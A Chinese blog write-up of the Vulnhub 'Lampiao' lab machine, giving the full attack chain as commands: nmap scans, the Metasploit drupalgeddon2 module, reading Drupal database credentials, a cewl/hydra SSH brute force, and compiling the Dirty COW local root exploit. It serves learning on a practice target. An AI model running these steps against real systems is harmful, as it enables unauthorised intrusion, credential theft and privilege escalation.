Vulnhub靶场篇:Lampiao 夜车星繁的博客
因为本透明水平看来还没达到手撕vulnhub的级别,所以这些靶场都是参考的前辈们的文章一步步来的,由于作者水平有限所以写的博客会“雷厉风行”走的是一步到位相对更简单的渗透路线,尽量少出现尝试并且失败渗透无果的方法。就当是无数条路线中每一步都“幸运”的成功的那条吧。
攻击机:Kali Linux IP:192.168.223.136
靶 机:Lampiao IP:192.168.223.144
开启Lampiao后首先看到的登录页面:
扫描出靶场ip地址后输出更详细信息:
nmap -T4 -A -v 192.168.223.144
扫描出两个端口和一堆乱码:
可以看到22端口和80端口开放,我们可以浏览器访问下20端口,再用命令:
nmap -sS -sV -T4 -A -p- 192.168.223.144
扫描列出更详细信息:
可以看到靶机另外开放了1898端口,我们分别访问这两个端口:
审计80端口未得到有用信息,我们在1898端口页面随便点一点:
点击进去后发现URL可以修改,我们将路径修改为:http://192.168.223.144:1898/?q=node/2
发现两个文件audio.m4a和qrc.png
尝试访问发现了其中一个音频提示,user tiago
另外发现一张二维码,使用CQR扫描得到一段鼓励:Try harder! muahuahua
在此页面使用火狐插件wappalyzer我们可以看到此cms类型及版本:
此时打开kali攻击机metasploit搜索相关信息并尝试利用:
search drupaluse exploit/unix/webapp/drupal_drupalgeddon2set rhosts 192.168.223.144set rport 1898exploitshellpython -c 'import pty;pty.spawn("/bin/bash")'#优化终端界面,便于操作
得到了www-data权限;
但是通过su命令无法提权
我们通过mysql数据库,修改tiago、Eder、ADMIN的密码;新开一个终端界面通过find查找settings.php配置文件的位置
find -name settings.php
cat /var/www/html/sites/default/settings.php
默认的settings.php存放位置为/var/www/html/sites/default/settings.php
找到了数据库用户名与密码
接下来可以有两个思路,一是暴力破解tiago用户的ssh密码;一是登录MySQL数据库修改tiago的密码:
我们此处选择cewl配合hydra爆破;
cewl是用来爬取网站页面信息生成密码字典的一个字典生成密码工具
cewl http://192.168.223.144:1898/?q=node/1 -w punisher.txt
hydra -l tiago -P punisher.txt 192.168.223.144 ssh
爆破出结果:
登录ssh
ssh tiago@192.168.223.144
接下来要进行提权,运行命令:uname -a查看系统内核版本:
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
发现这是16年版本;在Linux内核里有个9年高龄的漏洞:脏牛提权漏洞,在16年10月18日之前的Linux未打补丁则会有此漏洞
相关文章:https://www.freebuf.com/vuls/117331.html
搜索脏牛提权exp:
searchsploit dirty
在此我们使用cpp文件exp:
使用CP进行复制到本地,cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/Desktop
在kali机开启服务用于传送exp:
python -m SimpleHTTPServer 5555
在ssh用户tiago下下载exp并编译:
wget http://192.168.223.136:5555/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
- Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
- pedantic 允许发出ANSI/ISO C标准所列出的所有警告
- O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
- std=c++11就是用按C++2011标准来编译的
- pthread 在Linux中要用到多线程时,需要链接pthread库
- o dcow gcc生成的目标文件,名字为dcow
- 执行gcc编译可执行文件,可直接提权。
至此得到root权限,靶机渗透成功。
内容还是出现了让人不知如何是好的冗余,自己的水平还需努力,共勉
Vulnhub靶场篇:Lampiao 夜车星繁的博客相关推荐
- 封神台 -尤里的复仇Ⅰ write up 夜车星繁的博客
无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用.因为有了点基础在此写下payload只保证自己可以看得懂. 第一章:为了女神小芳! ?id=1 and ...
- 篇百度前员工发表的博客,在这篇长文里回忆了他离开百度的原因、他眼中的百度乱
这是一篇百度前员工发表的博客,在这篇长文里回忆了他离开百度的原因.他眼中的百度乱象以及对百度文化的反思.全文转载,无删减. 1.离开 离开百度已经一年多了. ...
- Vulnhub靶场篇:SkyDogConCTF2016
这是第二篇vunlnhub靶场相关的博客;SkyDog: 2016 – Catch Me If You Can 靶机渗透测试. 不建议学渗透的小伙伴去复现此篇,太费时.投入产出比并不高.个人认为有些靶 ...
- 9篇小白都能懂系列博客学完MySQL基础
博主经过三天的时间整理终于把MySOL基础部分内容总结成了这九篇博客,如果博主漏写了重点的基础部分的内容,或者说博主写的地方有错误还请CSDN的兄弟们提醒(这一点就比较重要了),由于博主的时间比较有限 ...
- Jerry Wang一篇介绍ABAP调试心得的博客上了SAP社区的首页
这篇博客是我2013年写的.
- 第一篇什么都没写的博客
这是我的第一篇博客 大家好 Pixiv 大家好 这是我的第一篇博客 此博客主要用来堆放各种奇怪的东西 由于个人编程水平有限,所以在相当一段时间内 这里面可能不会出现特别高质量的内容 另外本人只会使用散 ...
- 【综合类型第 21 篇】声明:更改 CSDN 博客昵称
这是[综合类型第 21 篇],如果觉得有用的话,欢迎关注专栏. 更改前昵称:程序人生道可道 更改后昵称:Allen Su 自己的第一篇博客是 2018年10月12日 12:07 写的,写博客将近一年, ...
- 突然想写一篇有关欧拉函数的博客
关于欧拉函数: 定义: φ(n)表示1~n中与n互质的数的个数: 求法: 已知n的标准分解式为: (哦对了,这里所有的因子都是质因子) 那么 然后求欧拉函数的两种方法: 1.按照定义暴力求解: in ...
- CommonJS,AMD,CMD区别 - 郑星阳 - ITeye博客
CommonJS,AMD,CMD区别 博客分类: seajs和requirejs JavaScript zccst转载 学得比较晕,再次看commonjs,amd, cmd时好像还是没完全弄清楚,今天 ...
最新文章
- List 数据add进去的是一个bean 的时候删除数据的方法
- pat 多项式A/B
- 图灵奖得主门徒、RISC-V 创始成员领衔,睿思芯科获数千万美金融资 | AI 创业周报第6期...
- SharePoint 2010: 使用Visio Services展示SCOM数据
- 基础知识:什么是ASP.NET Razor页面?
- python 完全面向对象_史上最全的Python面向对象知识点疏理
- 完全内核移植–kernel3.15.3
- 返回最大数,不同语言之间的比较
- linux中脚本循环语句,Shell脚本循环语句
- python mainloop作用_Tkinter中的mainloop应该如何理解?
- 让SQL2000的查询分析器能够直接编辑SQL2005的视图或存储过程
- matlab里数据类型转换,Matlab数据类型及转换
- 好嗨游戏:TapTap9.9分,《鸡你太美》这到底是什么魔鬼游戏?
- 怎么修改网页边框html,DIV+CSS网页布局之边框的设置方法
- SCI论文发表中需要经历哪些过程?
- 使用docker搭建xss挑战之旅环境
- CUDA C 编程指导(一):CUDA介绍
- 离开学校如何自学修炼成为一名网页设计师(四)
- 【大牛之路】大牛指导,报酬丰厚的开源项目---“谷歌编程之夏”
- 移动端跨平台开发方案解析